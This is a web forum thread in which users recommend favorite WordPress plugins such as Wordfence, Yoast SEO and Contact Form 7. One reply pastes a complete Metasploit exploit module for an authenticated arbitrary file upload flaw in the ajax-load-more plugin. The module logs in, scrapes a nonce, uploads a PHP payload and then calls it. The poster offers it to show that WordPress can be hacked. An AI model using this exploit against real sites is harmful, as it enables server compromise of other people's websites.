What are your favorite Wordpress Plugins?

aceofadsense

New member
Joined
Jan 22, 2013
Messages
70
Points
0
Are you running a blog on Wordpress CMS? What are Your favorite Wordpress Plugins that you would recommend to use for better blogging?
 

SIG

Active member
Joined
Oct 16, 2015
Messages
118
Points
28
My favorite WordPress plugins are:

  1. WordFence (Security plugin) - very important plugin.
  2. Jetpack (by WordPress) - good to viewing visitors, search terms, what visitors clicked on, where did they came from, etc. - It also comes with a bunch of handy features.
  3. WPSmush - to reduce image sizes - good for speeding up a little bit your blog/site.
  4. Contact form 7 - good contact form creator.


This is quite it.
 

Hugo E.

Member
Joined
Sep 8, 2014
Messages
243
Points
18
Hugo E.
According to my personal opinion, WP is already secure why you need a security plugin for it..It's weird.
 

SIG

Active member
Joined
Oct 16, 2015
Messages
118
Points
28
SIG
WordPress has vulnerabilities, and can be hacked. And I can prove it.

This is the most recent one:
WordPress Ajax Load More Plugin < 2.8.2 - File Upload Vulnerability

Discovered on: 2015-10-18

Going offtopic with this:
Code:
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
   
  include Msf::Exploit::FileDropper
  include Msf::HTTP::Wordpress
   
  def initialize(info = {})
    super(update_info(
      info,
      'Name'            => 'WordPress Plugin ajax-load-more Authenticated Arbitrary File Upload',
      'Description'     => %q{
          This module exploits an authenticated file upload vulnerability in Wordpress plugin
ajax-load-more versions < 2.8.2. Valid wordpress credentials are required for the exploit to work.
          Tested with version v2.7.3. (May work on older versions).
        },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Pizza Hat Hacker <PizzaHatHacker[A]gmail[.]com', # Vulnerability discovery & Metasploit module
        ],
      'References'      =>
        [
          ['WPVDB', '8209']
        ],
      'DisclosureDate'  => 'Oct 02 2015',
      'Platform'        => 'php',
      'Arch'            => ARCH_PHP,
      'Targets'         => [['ajax-load-more', {}]],
      'DefaultTarget'   => 0
    ))
     
    register_options(
    [
         OptString.new('WP_USER', [true, 'A valid wordpress username', nil]),
         OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
    ], self.class)
  end
   
  def user
    datastore['WP_USER']
  end
   
  def password
    datastore['WP_PASSWORD']
  end
   
  def check
    # Check plugin version
    ver = check_plugin_version_from_readme('ajax-load-more, 2.8.2')
    if ver
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end
   
  def exploit
    # Wordpress login
    print_status("#{peer} - Trying to login as #{user}")
    cookie = wordpress_login(user, password)
    if cookie.nil?
      print_error("#{peer} - Unable to login as #{user}")
      return
    end
     
    url = normalize_uri(wordpress_url_backend, 'profile.php')
    print_status("#{peer} - Retrieving WP nonce from #{url}")
    res = send_request_cgi({
      'method'   => 'GET',
      'uri'      => url,
      'cookie'   => cookie
    })
     
    if res and res.code == 200
      # "alm_admin_nonce":"e58b6d536d"
      res.body =~ /\"alm_admin_nonce\":\"([0-9a-f]+)\"/
      wp_nonce = $1
      if wp_nonce
        print_good("#{peer} Found ajax-load-more wp_nonce value : #{wp_nonce}")
      else
        vprint_error("#{peer} #{res.body}")
        fail_with(Failure::Unknown, "#{peer} - Unable to retrieve wp_nonce from user profile page.")
      end
    else
      fail_with(Failure::Unknown, "#{peer} - Unexpected server response (code #{res.code}) while accessing user profile page.")
    end
 
    print_status("#{peer} - Trying to upload payload")
     
    # Generate MIME message
    data = Rex::MIME::Message.new
    data.add_part('alm_save_repeater', nil, nil, 'form-data; name="action"')
    data.add_part(wp_nonce, nil, nil, 'form-data; name="nonce"')
    data.add_part('default', nil, nil, 'form-data; name="type"')
    data.add_part("#{rand_text_alpha_lower(3)}", nil, nil, 'form-data; name="repeater"')
    data.add_part(payload.encoded, nil, nil, 'form-data; name="value"')
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi({
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_admin_ajax),
      'ctype'    => "multipart/form-data; boundary=#{data.bound}",
      'data'     => data.to_s,
      'cookie'   => cookie
    })
     
    filename = 'default.php'
    if res
      if res.code == 200
        lines = res.body.split("\n")
        if lines.length > 0
          message = lines[lines.length - 1]
          if message.include?('Template Saved Successfully')
            register_files_for_cleanup(filename)
          else
            vprint_error("#{peer} - Unexpected web page content : #{message}")
          end
        else
          fail_with(Failure::Unknown, "#{peer} - Unexpected empty server response")
        end
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected HTTP response code : #{res.code}")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
     
    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end
 

SenseiSteve

Active member
Joined
Nov 11, 2015
Messages
207
Points
28
SEO by Yoast
WordFence
Contact Form 7
WP Edit

And yes, WordPress sites get hacked all the time. Keeping your themes and plugins up to date helps, but make sure you download plugins from authority sites and ensure they stay up to date with the current version of WordPress.
 

ulterios

New member
Joined
Nov 25, 2015
Messages
1,268
Points
0
It all depends on the site in some cases, but in general here are my favorites:

WordFence Security - Lots of good features and has a cache option which actually works real well

Slider Captcha - Keeps bots from trying to login to my site as well as eliminate spam

Google Analytics Dashboard for WP - To keep track of traffic and visitors

All In One SEO Pack - A lot of good stuff to make some SEO tasks easier.
 

Ron Killian

New member
Joined
Dec 3, 2015
Messages
804
Points
0
I agree Wordpress can be hacked. Anything can be hacked. Though most people who own wordpress have NO clue how many times each day people (bots) try to break in. Until you have a good security plugin, then you see what the bad guys are trying to do.

I put in another vote for Wordfence, great plugin.

Tried several image compression plugins, but best I found was Kraken. Works great.

Also like Intense Wordpress plugin. Ton's of shortcodes to dress up my content very nicely.

Disqus for comments.

As Ulterios said, Google analytics dashboard is nice.

MCE table button, gotta have tables.

Premium SEO pack - for obvious reasons.

Q2W3 Fixed Widget - Fixes widgets you want to stay in the sidebar as people scroll.

Simple Page Sidebars - Make custom sidebars and any post or page.

Uber Menu for better menu's, bigger, ect.

Wp Author Box - Much better author box.

WP Ad Pro to rotate ads and banners, track ad stats.

Just started using Zendesk for support. Think I like it. Can't say 100% yet. But there are not many good support plugins out there.

Woocommerce and many related plug-ins for it.
 

dnapick

New member
Joined
Jan 22, 2016
Messages
2
Points
0
It depends on a project but I always use;

SEo by Yoast
Custom CSS
WP Super Cache
 

tayyabwpb

New member
Joined
Apr 6, 2021
Messages
9
Points
1
My Favorites SEO Plugins are

  1. Analytify for Google Analytics
  2. Yoast SEO for SEO purpose
  3. WP Rocket for Website Speed Optimization
  4. Imagify for Image Optimization
  5. Autoptimization for CSS & JS minfication
 
Older threads
Replies
4
Views
1,592
Replies
4
Views
1,466
Replies
12
Views
3,751
Newer threads
Latest threads
Replies
0
Views
14
Replies
0
Views
9
Replies
0
Views
8
Similar threads

Referral contests

Referral link for :

Sponsors

Latest Blog ArticlesMost Viewed Threads

Popular tags

You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an alternative browser.

Top